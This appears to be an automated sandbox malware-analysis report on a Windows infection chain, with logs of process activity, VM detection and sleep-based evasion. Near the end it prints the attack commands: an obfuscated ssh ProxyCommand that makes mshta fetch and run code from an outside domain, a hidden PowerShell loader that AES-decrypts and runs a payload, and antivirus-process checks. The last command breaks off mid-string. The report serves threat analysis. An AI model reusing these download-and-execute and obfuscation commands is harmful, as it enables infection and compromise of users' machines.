Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1754	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1700	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1187	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 469	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5209	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4581	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 2704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 2704	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900	Thread sleep count: 1754 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep count: 1700 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep count: 1187 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep count: 469 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5560	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com TID: 7704	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\136140\Concerts.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_00406301 FindFirstFileW,FindClose,		9_2_00406301
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Code function: 9_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		9_2_00406CC7

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\136140	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\136140\	Jump to behavior

Source: powershell.exe, 00000007.00000002.2229800394.000001984A8A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW-
Source: mshta.exe, 00000005.00000002.2248903081.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248825747.000001F4D581E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D581D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2238124041.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2244892454.000001F4D58A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3294421212.000002342F22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3295887474.0000023434855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000007.00000002.2173755861.00000198325D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yDz
Source: powershell.exe, 00000007.00000002.2229800394.000001984A8A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ssh.exe, 00000000.00000002.2252664722.000002890FDA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe

Code function: 9_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

9_2_00406328

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://wserdtfyguhij.2024-vipticket.com/k.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://wserdtfyguhij.2024-vipticket.com/k.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AvOq($fZZic){return -split ($fZZic -replace '..', '0x$& ')};$QtEXr = AvOq('F71849245068CFBDCED10C084C6125F88EBB766A68F42618A519AD0E0FA55DFA41BBC0220A7CFC0548D5F0C8ECED91F3F0F6D99831685FEF33B4DEC446D39844DA6ABF150BB86E32B97BCE9734DD73710688BF213151B34198A7EB6F4BF3344166A3DEDC1DACA37BE736FB658BE94E1342E6771A99C5C4C7F81C8B6C9B6279B8D38EAA5AFE0414C8F15D23080FCB04B45D8EBA74D636519B8390011F025A39BC7700FA0681CE70921F7F651441D9609F8C8EAEF66688D0AFF54CD9E186A50129254415DC02D5A4BFE23D7079F563D2111FC83B360CA652CBD54EEA28CDF41EB427FD920B0D520462D045D63090F9624D6DA5E3EF4FFA25772809F9660376473448FC63DF83E3272E1791618E1D0EA5E9D4C40BA1AA89AAE6699A4098C7EE64ECCD62783C1B7D8650592C33F1372AC3509BC676C043FD52F1C6FBBC2010B71345705C84085A96E37CD2B12961AAEEE9DB058ADEF8828940F893309ACF84F8CF8015178D50FF22382C7405F48E91FA3129017B7EC4B284C242676968C97CD62FD0808CB85A7AC9F62C36CC17E1A4E6D6F0E16CD59736713C4F464A5A3A5967451878F4B8F13CEC3CBC042CE205E1628C1D90AD8D743AACF33604780843459139D46877D6B42A0FC19145594EFFEC326A1A0B6326112C4CE5BC279B26783822F68EB2AF9ADADE16BA3D008EEAAB4BF10BA18BA6037C1AFFD5DB8F63AD7ED00193207AA01009443C0AB2F530D584324A1F1D66ED86AD2E61DDF459BCAD3FD5E17C8E7856537300894C18877F3B57C14639BD9781F101D0005E813E71F05721A4EA8B0D052A454533A555B8785235E946B52D496FB71DE15C7BB50F3DCDA385BA2EC195C6AA39504F078B7F5295E4814F28C62055EC0AC8B78A04219E96C739CBED36806D0748376E6BE81C58A52AC85EB33543CE5AEAB7709978EF4CDA0021CBDA1CB44E4400FEF05CA556B0A2E939F422041C9BFFF1639890CF68637888D4ED48E4');$AqvND=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((AvOq('516866484F6B6B4270524E66557A6F4C')),[byte[]]::new(16)).TransformFinalBlock($QtEXr,0,$QtEXr.Length)); & $AqvND.Substring(0,3) $AqvND.Substring(253)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe "C:\Users\user\AppData\Roaming\IntroductoryTunes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IntroductoryTunes.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Envelope Envelope.cmd && Envelope.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 136140	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DEALERPICRESPONDEDCOURAGEPREREQUISITEOLYMPUSDIAGRAMENGAGED" Sunny	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Steady + ..\Ts + ..\Unnecessary + ..\Minutes + ..\Silk + ..\Contents + ..\Global d	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\136140\Concerts.com Concerts.com d	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command ('mshta.e]]]]]]]x]]]]]]e]]]]] ]]]]]h]]]]]t]]]]]]tp]]]]]s://]]]]]ws]]]]]]er]]]]]]d]]]]]]tf]]]]]y]]]]]]guh]]]]]]]i]]]]]]j]]]]]]].2024]]]]]]-vi]]]]]ptic]]]]]ke]]]]]t.com]]]]]]]/]]]]]k.m]]]]]]]p]]]]]4' -replace ']')" .
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function avoq($fzzic){return -split ($fzzic -replace '..', '0x$& ')};$qtexr = avoq('f71849245068cfbdced10c084c6125f88ebb766a68f42618a519ad0e0fa55dfa41bbc0220a7cfc0548d5f0c8eced91f3f0f6d99831685fef33b4dec446d39844da6abf150bb86e32b97bce9734dd73710688bf213151b34198a7eb6f4bf3344166a3dedc1daca37be736fb658be94e1342e6771a99c5c4c7f81c8b6c9b6279b8d38eaa5afe0414c8f15d23080fcb04b45d8eba74d636519b8390011f025a39bc7700fa0681ce70921f7f651441d9609f8c8eaef66688d0aff54cd9e186a50129254415dc02d5a4bfe23d7079f563d2111fc83b360ca652cbd54eea28cdf41eb427fd920b0d520462d045d63090f9624d6da5e3ef4ffa25772809f9660376473448fc63df83e3272e1791618e1d0ea5e9d4c40ba1aa89aae6699a4098c7ee64eccd62783c1b7d8650592c33f1372ac3509bc676c043fd52f1c6fbbc2010b71345705c84085a96e37cd2b12961aaeee9db058adef8828940f893309acf84f8cf8015178d50ff22382c7405f48e91fa3129017b7ec4b284c242676968c97cd62fd0808cb85a7ac9f62c36cc17e1a4e6d6f0e16cd59736713c4f464a5a3a5967451878f4b8f13cec3cbc042ce205e1628c1d90ad8d743aacf33604780843459139d46877d6b42a0fc19145594effec326a1a0b6326112c4ce5bc279b26783822f68eb2af9adade16ba3d008eeaab4bf10ba18ba6037c1affd5db8f63ad7ed00193207aa01009443c0ab2f530d584324a1f1d66ed86ad2e61ddf459bcad3fd5e17c8e7856537300894c18877f3b57c14639bd9781f101d0005e813e71f05721a4ea8b0d052a454533a555b8785235e946b52d496fb71de15c7bb50f3dcda385ba2ec195c6aa39504f078b7f5295e4814f28c62055ec0ac8b78a04219e96c739cbed36806d0748376e6be81c58a52ac85eb33543ce5aeab7709978ef4cda0021cbda1cb44e4400fef05ca556b0a2e939f422041c9bfff1639890cf68637888d4ed48e4');$aqvnd=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((avoq('516866484f6b6b4270524e66557a6f4c')),[byte[]]::new(16)).transformfinalblock($qtexr,0,$qtexr.length)); & $aqvnd.substring(0,3) $aqvnd.substring(253)
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function avoq($fzzic){return -split ($fzzic -replace '..', '0x$& ')};$qtexr = avoq('f71849245068cfbdced10c084c6125f88ebb766a68f42618a519ad0e0fa55dfa41bbc0220a7cfc0548d5f0c8eced91f3f0f6d99831685fef33b4dec446d39844da6abf150bb86e32b97bce9734dd73710688bf213151b34198a7eb6f4bf3344166a3dedc1daca37be736fb658be94e1342e6771a99c5c4c7f81c8b6c9b6279b8d38eaa5afe0414c8f15d23080fcb04b45d8eba74d636519b8390011f025a39bc7700fa0681ce70921f7f651441d9609f8c8eaef66688d0aff54cd9e186a50129254415dc02d5a4bfe23d7079f563d2111fc83b360ca652cbd54eea28cdf41eb427fd920b0d520462d045d63090f9624d6da5e3ef4ffa25772809f9660376473448fc63df83e3272e1791618e1d0ea5e9d4c40ba1aa89aae6699a4098c7ee64eccd62783c1b7d8650592c33f1372ac3509bc676c043fd52f1c6fbbc2010b71345705c84085a96e37cd2b12961aaeee9db058adef8828940f893309acf84f8cf8015178d50ff22382c7405f48e91fa3129017b7ec4b284c242676968c97cd62fd0808cb85a7ac9f62c36cc17e1a4e6d6f0e16cd59736713c4f464a5a3a5967451878f4b8f13cec3cbc042ce205e1628c1d90ad8d743aacf33604780843459139d46877d6b42a0fc19145594effec326a1a0b6326